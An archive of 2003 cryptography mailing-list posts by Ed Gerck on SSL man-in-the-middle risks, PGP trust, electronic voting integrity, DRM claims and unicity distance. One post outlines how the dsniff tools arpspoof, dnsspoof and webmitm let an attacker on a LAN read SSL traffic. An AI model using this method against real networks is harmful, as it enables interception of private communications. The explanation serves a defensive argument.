Re: Run a remailer, go to jail?

2003-03-31 Thread Ed Gerck
It would also outlaw pre-paid cell phones, that are anonymous
if you pay in cash and can be untraceable after a call. Not to
mention proxy servers. On the upside, it would ban spam ;-)

Cheers,
Ed Gerck

"Perry E. Metzger" wrote:

> http://www.freedom-to-tinker.com/archives/000336.html
>
> Quoting:
>
> Here is one example of the far-reaching harmful effects of
> these bills. Both bills would flatly ban the possession, sale,
> or use of technologies that "conceal from a communication
> service provider ... the existence or place of origin or
> destination of any communication".
>
> --
> Perry E. Metzger [EMAIL PROTECTED]
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]




Re: Who's afraid of Mallory Wolf?

2003-03-25 Thread Ed Gerck

Ben Laurie wrote:

> It seems to me that the difference between PGP's WoT and what you are
> suggesting is that the entity which is attempting to prove the linkage
> between their DN and a private key gets to choose which signatures
> the relying party should refer to.

PGP's WoT already does that. To be clear, in PGP the entity that is attempting
to prove the linkage between a DN and a public key chooses which signatures
are acceptable, their "degree of trust", and how these signatures became
acceptable in the first place. BTW, a similar facility also exists in X.509,
where the entity that is attempting to prove the linkage may accept or reject
a CA for that purpose (unfortunately, browsers make this decision
"automatically" for the user, but it does not need to be so).

That said, the paper does not provide a way to implement the method I
suggested. The paper only shows that such a method should exist.

Cheers,
Ed Gerck




Re: Who's afraid of Mallory Wolf?

2003-03-25 Thread Ed Gerck


Jeroen van Gelderen wrote:

> On Tuesday, Mar 25, 2003, at 14:38 US/Eastern, Ed Gerck wrote:
> > Let me sum up my earlier comments: Protection against
> > eavesdropping without MITM protection is not protection
> > against eavesdropping.
>
> You are saying that active attacks have the same cost as passive
> attacks. That is ostensibly not correct.

Cost is not the point, even though the cost is low and within the reach of
script kiddies.

> What we would like to do however is offer a little privacy protection
> trough enabling AnonDH by flipping a switch. I do have CPU cycles to
> burn. And so do the client browsers. I am not pretending to offer the
> same level of security as SSL certs (see note [*]).

I agree with this. This is helpful. However, supporting this by
asking "Who's afraid of Mallory Wolf?" is IMO not helpful --
because we should all be afraid of MITM attacks. It's not good
for security to deny an attack that is rather easy to do today.

> I'm proposing a slight, near-zero-cost improvement[*] in the status
> quo. You are complaining that it doesn't achieve perfection. I do not
> understand that.

Your proposal is, possibly, a good option to have. However, it does not
provide credible protection against eavesdropping. It is better than
ROT13, for sure.

Essentially, you're asking for encryption without an authenticated end-point.
This is acceptable. But I suggest that advancing your idea should not be
prefaced by denying or trying to hide the real problem of MITM attacks.

Cheers,
Ed Gerck






Re: Who's afraid of Mallory Wolf?

2003-03-25 Thread Ed Gerck


Jeroen van Gelderen wrote:

> 3. A significant portion of the 99% could benefit from
> protection against eavesdropping but has no need for
> MITM protection. (This is a priori a truth, or the
> traffic would be secured with SSL today or not exist.)

Let me sum up my earlier comments: Protection against
eavesdropping without MITM protection is not protection
against eavesdropping.

In addition, when you talk about HTTPS traffic (1%) vs.
HTTP traffic (99%) on the Internet you are not talking
about users' choices -- where the user is the party at risk
in terms of their credit card number. You're talking about
web-admins failing to protect third-party information they
request. Current D&O liability laws, making the officers
of a corporation personally responsible for such irresponsible
behavior, will probably help correct this much more efficiently
than just a few of us decrying it.

My personal view is that ALL traffic SHOULD be encrypted,
MITM protected, and authenticated, with the possibility of
anonymous authentication if so desired. Of course, this is
not practical today -- yet. But we're working to get there.
BTW, a source once told me that about 5% of all email traffic
is encrypted. So, your 1% figure is also just a part of the picture.

Cheers --/Ed Gerck








Re: Who's afraid of Mallory Wolf?

2003-03-25 Thread Ed Gerck


Jeroen van Gelderen wrote:

> Heu? I am talking about HTTPS (1) vs HTTP (2). I don't see how the MSIE
> bug has any effect on this.

Maybe we're talking about different MSIE bugs, which is not hard to do ;-)
I was referring to the MSIE bug that affects the SSL handshake in HTTPS,
from the context in discussion. BTW, HTTP has no provision to prevent
MITM in any case -- in fact, establishing a MITM is part of the HTTP
toolbox, used in reverse proxies for example.




Re: Who's afraid of Mallory Wolf?

2003-03-25 Thread Ed Gerck


Ben Laurie wrote:

> Ed Gerck wrote:
> > ;-) If anyone comes across a way to explain it, that does not require study,
> > please let me know and I'll post it.
>
> AFAICS, what it suggests, in a very roundabout way, is that you may be
> able to verify the binding between a key and some kind of DN by being
> given a list of signatures attesting to that binding. This is pretty
> much PGP's Web of Trust, of course. I could be wrong, I only read it
> quickly.

This would still depend on what the paper calls "extrinsic references",
that are outside the dialogue and create opportunity for faults (intentional
or otherwise). The resulting problems for PGP are summarized in
www.mcg.org.br/cert.htm#1.2.






Re: Who's afraid of Mallory Wolf?

2003-03-25 Thread Ed Gerck


"Jeroen C. van Gelderen" wrote:

> 1. Presently 1% of Internet traffic is protected by SSL against
> MITM and eavesdropping.
>
> 2. 99% of Internet traffic is not protected at all.

I'm sorry, but no. The bug in MSIE, which prevented the correct
processing of cert path constraints and led to easy MITM
attacks, has been fixed for some time now. Consulting browser
statistics sites will show that the MSIE update in question,
fueled by the need for other security updates, is making
good progress.

> 3. A significant portion of the 99% could benefit from
> protection against eavesdropping but has no need for
> MITM protection. (This is a priori a truth, or the
> traffic would be secured with SSL today or not exist.)

I'm sorry, but the "a priori truth" above is false. Ignorance about
the flaw, which is now fixed, and the need to mount a LAN attack (if
you do not want to mess with the DNS) have helped avert a major
public exploit. The hole is now fixed, and the logic fails for this
reason as well.

> 4. The SSL infrastructure (the combination of browsers,
> servers and the protocol) does not allow the use of
> SSL for privacy protection only. AnonDH is not supported
> by browsers and self-signed certificates as a workaround
> don't work well either.

There is a good reason -- MITM. AnonDH and self-signed
certs cannot prevent MITM.

>
> 5. The reason for (4) is that the MITM attack is overrated.
> People refuse to provide the privacy protection because
> it doesn't protect against MITM. Even though MITM is not
> a realistic attack (2), (3).

But it is, please see the spoof/MITM method in my previous post.
Which, BTW, is rather old info in some circles (3 years?) and is
easy to do by script kiddies with no knowledge about anything we
are talking about here -- they can simply do it. Anyone can do it.

> (That is not to say that (1) can do without MITM
>  protection. I suspect that IanG agrees with this
>  even though his post seemed to indicate the contrary.)

I think Ian's post, with all due respect to Ian, reflects a misconception
about cert validation. The misconception is that cert validation can
be provided as an absolute reference -- it cannot. The *mathematical*
reasons are explained in the paper I cited. This misconception
was discussed some 6 years ago in the ssl-talk list and other lists, and
clarified at the time -- please see the archives. It was good, however,
to post this again and, again, to allow this to be clarified.

>
> 6. What is needed is a system that allows hassle-free,
> incremental deployment of privacy-protecting crypto
> without people whining about MITM protection.

You are asking for the same thing that was asked, and answered,
6 years ago in the ssl-talk and other lists. There is a way to do it
and the way is not self-signed certs or SSL AnonDH.

> Now, this is could be achieved by enabling AnonDH in the SSL
> infrastructure and making sure that the 'lock icon' is *not* displayed
> when AnonDH is in effect. Also, servers should enable and support
> AnonDH by default, unless disabled for performance reasons.

Problem -- SSL AnonDH cannot prevent MITM. The solution is
not to deny the problem and ask "who cares about MITM?"

> Ed Gerck wrote:
> > BTW, this is NOT the way to make paying for CA certs go
> > away. A technically correct way to do away with CA certs
> > and yet avoid MITM has been demonstrated to *exist*
> > (not by construction) in 1997, in what was called intrinsic
> > certification -- please see  www.mcg.org.br/cie.htm
>
> Phew, that is a lot of pages to read (40?). It's also rather tough
> material for me to digest. Do you have something like an example
> approach written up? I couldn't find anything on the site that did not
> require study.
>
;-) If anyone comes across a way to explain it, that does not require study,
please let me know and I'll post it.

OTOH, some practical code is being developed, and has been successfully
tested in the past 3 years with up to 300,000 simultaneous users, which
may provide the example you ask for. Please write to me privately if you'd
like to use it.

Cheers,
Ed Gerck




Re: Who's afraid of Mallory Wolf?

2003-03-24 Thread Ed Gerck

Ian Grigg wrote:

> ...
> The analysis of the designers of SSL indicated
> that the threat model included the MITM.
>
> On what did they found this?  It's hard to pin
> it down, and it may very well be, being blessed
> with nearly a decade's more experience, that
> the inclusion of the MITM in the threat model
> is simply best viewed as a mistake.

I'm sorry to say it but MITM is neither a fable nor
restricted to laboratory demos. It's an attack available
today even to script kiddies.

For example, there is a possibility that some evil attacker
redirects the traffic from the user's computer to his own
computer by ARP spoofing. With the programs arpspoof,
dnsspoof and webmitm in the dsniff package it is possible
for a script kiddie to read the SSL traffic in cleartext (list
of commands available if there is list interest). For this attack
to work the user and the attacker must be on the same LAN
or ... the attacker could be somewhere else using a hacked
computer on the LAN -- which is not so hard to do ;-)
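The post offers to share the command list on request. As a hedged sketch only (not the author's actual list), the dsniff 2.x invocations for this kind of attack typically look like the following; the interface name and the IP addresses are placeholders:

```shell
# Hypothetical sketch of the LAN MITM described above, using the
# dsniff package (arpspoof, dnsspoof, webmitm). Requires root and
# IP forwarding on the attacking host; addresses are placeholders.

# 1. Poison the victim's ARP cache so the gateway's traffic is
#    routed through the attacker's machine:
arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

# 2. Forge DNS replies so the victim resolves the target site
#    to the attacker's address:
dnsspoof -i eth0

# 3. Terminate the victim's SSL connection with a self-signed cert
#    and relay (while reading) the traffic:
webmitm -d
```

The only visible symptom on the victim's side is the certificate warning discussed later in the post, which is why the warning matters.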

>...
> Clearly, the browsers should not discriminate
> against cert-less browsing opportunities

The only sign of the spoofing attack is that the user gets a
warning about the certificate that the attacker is presenting.
It's vital that the user does not proceed if this happens --
contrary to what you propose.

BTW, this is NOT the way to make paying for CA certs go
away. A technically correct way to do away with CA certs
and yet avoid MITM has been demonstrated to *exist*
(not by construction) in 1997, in what was called intrinsic
certification -- please see  www.mcg.org.br/cie.htm

Cheers,
Ed Gerck




Re: double shot of snake oil, good conclusion

2003-03-08 Thread Ed Gerck
Tal Garfinkel wrote:

> ...
> Clearly, document controls are not a silver bullet, but if used properly
> I believe they do provide a practical means of helping to restrict the
> propagation of sensitive information.

I believe we are in agreement on many points. Microsoft's mistake was
to claim that "For example, it might be possible to view a document but
not to forward or print it."  As I commented, of course it is possible
to copy or forward it. Thus, claiming that it isn't possible is snake oil,
and I think we need to point it out.

I'd hope that the emphasis on trustworthy computing will help Microsoft
weed out these declarations and, thus, help set a higher standard.

Cheers,
Ed Gerck





Re: Scientists question electronic voting

2003-03-07 Thread Ed Gerck


"(Mr) Lyn R. Kennedy" wrote:

> On Thu, Mar 06, 2003 at 10:35:22PM -0500, Barney Wolff wrote:
> >
> > We certainly don't want an electronic system that is more
> > vulnerable than existing systems, but sticking with known-to-be-terrible
> > systems is not a sensible choice either.
>
> Paper ballots, folded, and dropped into a large transparent box, is not a
> broken system.

The broken system is the *entire* system -- from voter registration,
to ballot presentation (butterfly?), ballot casting, ballot storage,
tallying, auditing, and reporting.

> It's voting machines, punch cards, etc that are broken.
> I don't recall seeing news pictures of an election in any other western
> democracy where they used machines.

Brazil, 120 million voters, 100% electronic in 2002, close to 100%
since the 90's, no paper copy (and it failed when tried). BTW, the
3 nations with the largest numbers of voters are, respectively:

- India
- Brazil
- US

Cheers,
Ed Gerck




Re: Scientists question electronic voting

2003-03-07 Thread Ed Gerck


David Howe wrote:

> "Francois Grieu" <[EMAIL PROTECTED]> wrote:
> > Then there is the problem that the printed receipt must not be usable
> > to determine who voted for who, even knowing in which order the
> > voters went to the machine. Therefore the printed receipts must be
> > shuffled. Which brings us straight back to papers in a box, that we
> > shake before opening.
> This may be the case in france - but in england, every vote slip has a
> unique number which is recorded against the voter id number on the
> original voter card. any given vote *can* be traced back to the voter
> that used it.

This is true in the UK, but legal authorization is required to do so. In
the US, OTOH, the paper voting systems today are done in such a way
that the privacy of the vote is immune even to a court order to disclose it.
Voters are not anonymous, as they must be identified and listed in the
voter list at each poll place, but it is impossible (or, should be) to link
a voter to a vote. This imposes, for example, limits on the time-stamp
accuracy and other factors such as storage ordering that could help in
linking a voter to a vote.

Cheers,
Ed Gerck




Re: Scientists question electronic voting

2003-03-07 Thread Ed Gerck


Anton Stiglic wrote:

> - Original Message -
> From: "Ed Gerck" <[EMAIL PROTECTED]>
>
> [...]
> > "For example, using the proposed system a voter can easily, by using a
> > small concealed camera or a cell phone with a camera, obtain a copy of
> > that receipt and use it to get money for the vote, or keep the job. And
> > no one would know or be able to trace it."
>
> But that brings up my point once again:  These problems already exist
> with current paper-ballot voting schemes,

Maybe you missed some of my comments before, but these problems
do not exist in current paper-ballot voting schemes. Why should
e-voting make it worse?

> what exactly are you trying to
> achieve with an electronic voting scheme?

My target is the same level of voter privacy and election integrity that a
paper-ballot system has when ALL election clerks are honest and do not
commit errors. Please see Proc. Financial Cryptography 2001, p. 257 and
258 of my article on "Voting System Requirements", Springer Verlag.

> Do you simply want to make
> the counting of the votes more reliable, and maintain the security of all
> other aspects, or improve absolutely everything?

Of all aspects that need to be improved when moving to an electronic
system, the most important is the suspicion or fear that thousands or even
millions of electronic records could be altered with a keystroke, from
a remote laptop or some untraceable source. This goes hand-in-hand
with questions about the current "honor system" in voting systems,
where vendors make the machines and also operate them during an
election. It's the overall black-box approach that needs to be improved.
The "trust me!" approach has had several documented problems
in paper ballot systems and would present even more opportunities
for fraud, or even plain simple errors, in an electronic system.

The solution is to add multiple channels with at least some independence.
The paper channel is actually hard to secure and expensive to store
and process. Paper would also be a step backwards in terms of efficiency
and there is nothing magical about a paper copy that would make it
invulnerable to fraud/errors.

Cheers,
Ed Gerck




Re: Scientists question electronic voting

2003-03-06 Thread Ed Gerck
Dan Riley wrote:

> The vote can't be final until the voter confirms the paper receipt.
> It's inevitable that some voters won't realize they voted the wrong
> way until seeing the printed receipt, so that has to be allowed for.
> Elementary human factors.

This brings in two other factors I have against this idea:

- a user should not be called upon to distrust the system that the user
is trusting in the first place.

- too many users may reject the paper receipt because they changed their
minds, making it impossible to say whether the e-vote was wrong or
correct based on the number of rejected e-votes.

> But this whole discussion is terribly last century--still pictures are
> passe.  What's the defense of any of these systems against cell phones
> that transmit live video?

This was in my first message, and some subsequent ones too:

"For example, using the proposed system a voter can easily, by using a
small concealed camera or a cell phone with a camera, obtain a copy of
that receipt and use it to get money for the vote, or keep the job. And
no one would know or be able to trace it."

Cheers,
Ed Gerck




multiple system - Re: Scientists question electronic voting

2003-03-06 Thread Ed Gerck


"Trei, Peter" wrote:

> Ballot boxes are also subject to many forms of fraud. But a dual
> system  (electronic backed up by paper) is more resistant to
> attack then either alone.

The dual, and even multiple, system can be done without a paper ballot.
There is nothing "magic" about paper as a record medium. I
can send a link for a paper on this that was presented at the
Tomales Bay conference on voting systems last year, using Shannon's
Tenth Theorem as the theoretical background, introducing the idea
of multiple "witnesses". If two witnesses are not 100% mutually
dependent, the probability that both witnesses may fail at the same
time is smaller than that of any single witness to fail.
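The witness argument above can be checked with a toy calculation. The independence assumption and the failure rates below are illustrative, not from the post:

```python
# Toy check of the multiple-witness argument: with (assumed)
# independent witnesses, the chance that *all* records fail together
# is the product of the individual failure probabilities, which is
# smaller than the failure probability of any single witness.

def joint_failure(p_failures):
    """Probability that every independent witness fails at once."""
    result = 1.0
    for p in p_failures:
        result *= p
    return result

p_electronic = 0.01  # hypothetical failure rate of the electronic record
p_second = 0.05      # hypothetical failure rate of a second, independent record

both = joint_failure([p_electronic, p_second])
assert both < min(p_electronic, p_second)
print(round(both, 6))  # 0.0005 under these hypothetical rates
```

The improvement holds only to the degree the witnesses really are independent; two records kept by the same machine share failure modes, which is the point of the "not 100% mutually dependent" qualifier.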

Cheers,
Ed Gerck




Re: Scientists question electronic voting

2003-03-06 Thread Ed Gerck


David Howe wrote:

> at Thursday, March 06, 2003 5:02 PM, Ed Gerck <[EMAIL PROTECTED]> was seen
> to say:
> > On the other hand, photographing a paper receipt behind a glass, which
> > receipt is printed after your vote choices are final, is not readily
> > deniable because that receipt is printed only after you confirm your
> > choices.
> as has been pointed out repeatedly - either you have some way to "bin"
> the receipt and start over, or it is worthless (and merely confirms you
> made a bad vote without giving you any opportunity to correct it)
> That given, you could vote once for each party, take your photograph,
> void the vote (and receipt) for each one, and then vote the way you
> originally intended to :)

No, as I commented before, voiding the vote in that proposal after the paper
receipt is printed is a serious matter -- it means that either the machine made
an error in recording the e-vote or (as is oftentimes neglected) the machine
made an error in printing the vote. The voter's final choice and legally binding
confirmation is made before the printing. And that is where the problems
reside (the problems that we were trying to solve in the first place), in that
printed ballot. Plus there is the problem of the voter being able to photograph
that final receipt and present it as direct proof of voting, either as the voter
leaves the poll place (with no chance for image processing) or by an
immediate cell-phone link (ditto).

Cheers,
Ed Gerck




Re: Scientists question electronic voting

2003-03-06 Thread Ed Gerck
bear wrote:

> Let's face it, if somebody can *see* their vote, they can record it.

Not necessarily. Current paper ballots do not offer you a way to record
*your* vote. You may even photograph your ballot, but there is no way to
prove that *that* was the ballot you cast. In the past, we had ballots with
different colors for each party ;-) so people could see whether you were
voting Republican or Democrat, but this is no longer the case.


> and if someone can record it, then systems for counterfeiting such a
> record already exist and are already widely dispersed.

It's easier than one may think to obtain reliable proof if you can photograph
the ballot that you *did* cast (as in that proposal for printing a paper receipt
with your vote choices) -- just wait outside the poll place and demand the
film right there, or hear the voter's voice right then and have the image sent
by cell phone before the voter leaves the poll booth.

Cheers,
Ed Gerck




Re: Scientists question electronic voting

2003-03-06 Thread Ed Gerck


Anton Stiglic wrote:

> -Well the whole process can be filmed, not necessarily photographed...
> It's difficult to counter the "attack". In your screen example, you can
> photograph the vote and then immediately photograph the "thank you";
> if the photographs include the time in milliseconds, and the interval is
> short, you can be confident to some degree that the vote that was
> photographed was really the vote that was cast.
> You can have tamper-resistant film/photograph devices and whatever you
> want, have the frames digitally signed and timestamped,
> but this is where I point out that you need to consider the value of the
> vote to estimate how far an extortionist would be willing to go.

The electronic process can be made much harder to circumvent by
allowing voters to cast any number of ballots but counting only the last
ballot cast. Since a voter could always cast another vote after the one that
was so carefully filmed, such a film would have no value.

BTW, a similar process happens in proxy voting for shareholders meeting,
where voters can send their vote (called a "proxy") before the meeting
but can also go to the meeting and vote any way they please -- trumping
the original vote.
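The "count only the last ballot" rule can be sketched in a few lines. This is a minimal illustration under my own assumptions (ballots arrive in time order as voter-id/choice pairs), not the design of any actual system:

```python
# Minimal sketch of "cast any number of ballots, count only the last":
# ballots arrive in time order as (voter_id, choice) pairs, and a later
# ballot from the same voter silently replaces the earlier one -- so a
# coerced, filmed vote can always be overridden afterwards.

def tally_last_ballots(ballots):
    last = {}                      # voter_id -> most recent choice
    for voter_id, choice in ballots:
        last[voter_id] = choice    # later entries overwrite earlier ones
    counts = {}
    for choice in last.values():
        counts[choice] = counts.get(choice, 0) + 1
    return counts

ballots = [("v1", "A"), ("v2", "B"), ("v1", "B")]  # v1 re-votes, trumping "A"
print(tally_last_ballots(ballots))  # {'B': 2}
```

The same replacement rule is what makes the shareholder proxy analogy work: the proxy sent before the meeting is simply the earlier entry that a vote at the meeting overwrites.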

Much work needs to be done, and tested, to protect the integrity of
public elections. Even with all such precautions, if  the choices made by
a voter are disclosed (ie, not just the tally for all voters) then a voter
can be identified by using an unlikely pattern -- and the Mafia has,
reportedly, used this method in Italy to force (and enforce) voter
choices in an otherwise private ballot.

Cheers,
Ed Gerck




Re: double shot of snake oil, good conclusion

2003-03-06 Thread Ed Gerck


Tal Garfinkel wrote:

> The value of these types of controls is that they help users you basically
> trust, who might be careless, stupid, lazy or confused, to do the right
> thing (however the right thing is defined, according to your company
> security policy).

It beats me that "users you basically trust" might also be "careless, stupid,
lazy or confused" ;-)

Your point might be better expressed as "the company security policy would
be followed even if you do NOT trust the users to do the right thing." But,
as we know, this only works if the users are not malicious, if social engineering
cannot be used, if there are no disgruntled employees, and other equally
improbable factors.

BTW, one of the arguments that Microsoft uses to motivate people to
be careful with unlawful copies of Microsoft products is that disgruntled
employees provide the bulk of all their investigations on piracy, and everyone
has disgruntled employees. We also know that insider threats are responsible
for 71% of computer fraud.

Thus, the net effect of these types of controls is to harass the legitimate
users and give a false sense of security. It reminds me of a cartoon I saw
recently, where the general tells a secretary to shred the document, but
make a copy first for the files.

Cheers,
Ed Gerck




Re: Scientists question electronic voting

2003-03-06 Thread Ed Gerck


Anton Stiglic wrote:

> An extortionist could provide their own camera device to the voter, which
> has
> a built in clock that timestamps the photos and does some watermarking, or
> something like that, which could complicate the counter-measures. But this
> problem already exists with current non-electronic voting scheme.
> It depends on the value attributed to a vote (would an extortionist be
> willing to provide these custom devices?).

This is not possible with current paper ballots, for several reasons. For
example, if you take a picture of your punch card as proof of how you
voted, what is to prevent you -- after the picture is taken -- from punching
another hole for the same race and invalidating your vote? Or from asking
the clerk for a second ballot, saying that you punched the wrong hole,
and voting for another candidate? The same goes for optical scan
cards. These "proofs" are easily deniable and, thus, have no value
as proof of how the voter actually voted.

Likewise, electronically, there is no way that a voter could prove how he
voted, even if the confirmation screen does list all the choices that the
voter has made, provided that screen has two buttons ("go back" and
"confirm") and suitable logic. After the voter presses "confirm" the voter
sees a "thank you" screen without any choices present. The logic can be
set up in such a way, in terms of key presses and intermediate states, that
even photographing the mouse cursor on a pressed "confirm" button does
not prove that the voter did not take the mouse out and, instead, pressed
the "go back" button to change his choices.
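The confirmation logic described above can be sketched as a tiny state machine. The class and method names are hypothetical, chosen only to illustrate why a photo of the review screen is deniable:

```python
# Hypothetical sketch of the deniable confirmation logic: the review
# screen displays the choices, but nothing is committed until "confirm";
# "go back" discards the displayed choices, so a photo of the review
# screen proves nothing about the vote that finally counts.

class VotingTerminal:
    def __init__(self):
        self.pending = None    # choices shown on the review screen
        self.committed = None  # the only choices that ever count

    def review(self, choices):
        self.pending = choices
        return f"REVIEW: {choices}"   # photographable, but not binding

    def go_back(self):
        self.pending = None           # voter may now select again
        return "SELECT"

    def confirm(self):
        self.committed = self.pending
        self.pending = None
        return "THANK YOU"            # no choices displayed after commit

t = VotingTerminal()
t.review(["A"])       # the photographed "proof"
t.go_back()
t.review(["B"])
t.confirm()
print(t.committed)    # ['B'] -- the photo of ["A"] proved nothing
```

A paper receipt printed at the `confirm` step removes exactly this deniability, which is the contrast the paragraph that follows draws.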

On the other hand, photographing a paper receipt behind a glass, which
receipt is printed after your vote choices are final, is not readily deniable
because that receipt is printed only after you confirm your choices.

To deny that receipt the voter would have to say that the machine erred,
which, if proved otherwise, could lead to criminal charges (e.g., the
machine would be taken off the polls and, after the polls close the
machine would be tallied; if the electronic tally would agree with the
paper tally, the voter would be in trouble).

Protection against providing voters a receipt, voluntary or not, is often
overlooked by those who are not familiar with election issues.  For
example, the first press release by MIT/Caltech principals after Nov/2000 said
that the solution would be to provide the voter with a receipt showing how
they voted. Later on, MIT/Caltech reformed that view and have been doing an
excellent job at what I see as a process of transforming elections from art
to science, which is a good development after Nov/2000.

Cheers,
Ed Gerck





Scientists question electronic voting

2003-03-05 Thread Ed Gerck

Henry Norr had an interesting article today at
http://sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2003/03/03/BU122767.DTL&type=business

Printing a paper receipt that the voter can see is a proposal that addresses
one of the major weaknesses of electronic voting. However, it creates
problems that are even harder to solve than the silent subversion of e-records.

For example, using the proposed system a voter can easily, by using a
small concealed camera or a cell phone with a camera, obtain a copy of
that receipt and use it to get money for the vote, or keep the job. And
no one would know or be able to trace it.

Of course, proponents of the paper ballot copy, like Peter Neumann and
Rebecca Mercuri, will tell you the same thing that Peter affirmed in an official
testimony  before the California Assembly Elections & Reapportionment Committee
on January 17, 2001, John Longville, Chair, session on touch-screen (DRE)
voting systems, as recorded by C-SPAN (video available):

  "...I have an additional constraint on it [a voter approved paper ballot produced
  by a DRE machine] that  it  is behind reflective glass so that if you try to
  photograph it with a little secret camera hidden in your tie so you can go out and
  sell your vote for a bottle of whiskey or whatever it is, you will get a blank image.
  Now this may sound ridiculous from the point of view of trying to protect the
  voter, but this problem of having a receipt in some way that verifies that what
  seems to be your vote actually was recorded properly, is a fundamental issue."

I was also in Sacramento that same day, and this was my reply, in the next panel,
also with a C-SPAN videotape:

  ".. I would like to point out that it is very hard sometimes to take opinions, even
  though from a valued expert, at face value. I was hearing the former panel [on
  touch screen DRE systems] and Peter Neumann, who is a man beyond all best
  qualifications, made the affirmation that we cannot photograph what we can see.
  As my background is in optics, with a doctorate in optics, I certainly know that is
  not correct. If we can see the ballot we can photograph it, some way or another."

But, look, it does not require a Ph.D. in physics to point out that what Peter says is
incorrect -- of course you can photograph what you see. In other words, Peter's
"solution" goes the way much of this DRE discussion has gone -- paying lip service
to science while contradicting basic scientific principles and progress.  After all, what's the
scientific progress behind storing a piece of paper as evidence? And, by the way, are
not paper ballots what were mis-counted, mis-placed and lost in Florida?

Finally, what we see in this discussion is also exactly what we in IT security
know that we need to avoid. Insecure statements that create a false sense of
security -- not to mention a real sense of angst. This statement, surely vetted by
many people before it was printed, points out how much we need to improve in
terms of a real-world model for voting.

This opinion is my own, and is not a statement by any company.

Cheers,
Ed Gerck

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Comments/summary on unicity discussion

2003-03-05 Thread Ed Gerck
e. This
is often confusing and may give the wrong impression that
nothing is gained by compression or that we may need to "hide"
the compression algorithm from the attacker.


2. READING THE FINE PRINT
Of further importance, and often ignored or even contradicted by
statements in the literature such as "any cipher can be attacked by
exhaustively trying all possible keys", is the fact that any cipher
(including 56-bit-key DES) can be theoretically secure against any attacker
-- even an attacker with unbounded resources -- when the cipher is used
within its unicity distance. Not only the
One-Time Pad is theoretically secure, but any cipher can be theoretically
secure if used within the unicity distance. Thus, indeed there is a
theoretically secure defense even against brute-force attacks, which is to
work within the unicity limit of the cipher. And, it works for any cipher
that is a good random cipher -- irrespective of key-length or encryption
method used.

It is also important to note, as the literature has not been very neat
in this regard, that unicity always refers to the plaintext. However,
it may also be applied to indicate the least amount of ciphertext which
needs to be intercepted in order to attack the cipher -- within the
ciphertext/plaintext granularity. For example, for a simple OTP cipher
this shortcut is harmless because one byte of ciphertext links back to one
byte of plaintext -- so, a unicity of n bytes implies n bytes of ciphertext.
For DES, however, the ciphertext must be considered in blocks of 8
bytes -- so, a unicity of n bytes implies a ciphertext length rounded up
to the next multiple of 8 bytes.

3. ONLINE REFERENCES

[Sha49] Shannon, C. Communication Theory of Secrecy Systems. Bell Syst.
Tech. J., vol. 28, pp. 656-715, 1949.  See also
http://www3.edgenet.net/dcowley/docs.html for readable scanned images of
the complete original paper and Shannon's definition of "unicity distance"
on page 693.  Arnold called my attention to a typeset version of the paper at
http://www.cs.ucla.edu/~jkong/research/security/shannon.html.

[Sha48] Shannon, C. A Mathematical Theory of Communication. Bell Syst.
Tech. J., vol. 27, pp. 379-423, July 1948. See also
http://cm.bell-labs.com/cm/ms/what/shannonday/paper.html

Anton also made available the following link, with notes he took for
Claude Crepeau's crypto course at McGill. See page 24 and following at
http://crypto.cs.mcgill.ca/~stiglic/Papers/crypto1.ps
(Anton notes that it's not unlikely that there are errors in those notes).

Comments are welcome.

Cheers,
Ed Gerck




Re: double shot of snake oil, good conclusion

2003-03-05 Thread Ed Gerck

"A.Melon" wrote:

> Ed writes claiming this speculation about Palladium's implications is
> mis-informed:
>
> > while others speculated on "another potentially devastating effect",
> > that the DRM could, via a loophole in the DoJ consent decree, allow
> > Microsoft to withhold information about file formats and APIs from
> > other companies which are attempting to create compatible or
> > competitive products
>
> I think you misunderstand the technical basis for this claim.  The
> point is Palladium would allow Microsoft to publish a file format and
> yet still control compatibility via software certification and
> certification on content of the software vendor whose software created
> it.

We are in agreement. When you read the whole paragraph that I wrote,
I believe it is clear that my comment was not whether the loophole existed
or not. My comment was that there was a much more limited implication
for whistle-blowing because DRM can't really control what humans do
and there is no commercial value in saying that a document that I see
cannot be printed or forwarded -- because it can.

> Your other claims about the limited implications for whistle-blowing
> (or file trading of movies and mp3s) I agree with.

And that's what my paragraph meant.

Cheers,
Ed Gerck




double shot of snake oil, good conclusion

2003-03-02 Thread Ed Gerck

#1
In  http://www.extremetech.com/article2/0,3973,906344,00.asp,
this article on MS DRM states: "For example, it might be possible to
view a document but not to forward or print it."

This is, of course, blatantly false. Of course the document can be forwarded or
printed: by using a screenshot, a camera, a cell phone with a camera or, simply,
human memory. With all due respect, the claim is snake oil.

This is exactly what we in IT security must avoid. Insecure statements that
create a false sense of security -- not to mention a real sense of angst. This
statement, surely vetted by many people before it was printed, points out
how much we need to improve in terms of a real-world model for IT security.

And that is why, today, IT security failures are causing an estimated
loss of $60B/year (ASIS, PricewaterhouseCoopers, 2001).

#2
The second shot of snake oil came when some people, without realizing
the trap, started to get alarmed by the snake oil shot #1 and started
speculating on "the chilling effect that such measures could have on
corporate whistleblowers" while others speculated on "another potentially
devastating effect", that the DRM could, via a loophole in the  DoJ
consent decree, allow Microsoft to withhold information about file
formats and APIs from other companies which are attempting to create
compatible or competitive products -- compatible, that is, with the first
shot of snake oil.

The good conclusion from all of this seems to be that while humans are the
weakest link in a virtuous security system, they can also help break a
non-virtuous security system -- DRM snake oil claims notwithstanding.

Cheers,
Ed Gerck





Re: AES-128 keys unique for fixed plaintext/ciphertext pair?

2003-02-21 Thread Ed Gerck


"Arnold G. Reinhold" wrote:

> At 2:18 PM -0800 2/19/03, Ed Gerck wrote:
> >The previous considerations hinted at but did not consider that a
> >plaintext/ciphertext pair is not only a random bit pair.
> >
> >Also, if you consider plaintext to be random bits you're considering a very
> >special -- and least used -- subset of what plaintext can be. And, it's a
> >much easier problem to securely encrypt random bits.
> >
> >The most interesting solution space for the problem, I submit, is in the
> >encryption of human-readable text such as English, for which the previous
> >considerations I read in this list do not apply, and provide a false sense of
> >strength. For this case, the proposition applies -- when qualified for  the
> >unicity.
> >
>
> Maybe I'm missing something here, but the unicity rule as I
> understand it is a probabilistic result.  The likelihood of two keys
> producing different natural language plaintexts from the same cipher
> text falls exponentially as the message length exceeds the unicity
> distance, but it never goes to zero.

Arnold,

This may sound intuitive but is not correct. Shannon proved that if
"n" (bits, bytes, letters, etc.) is the unicity distance of a ciphersystem,
then ANY message  that is larger than "n" bits CAN be uniquely deciphered
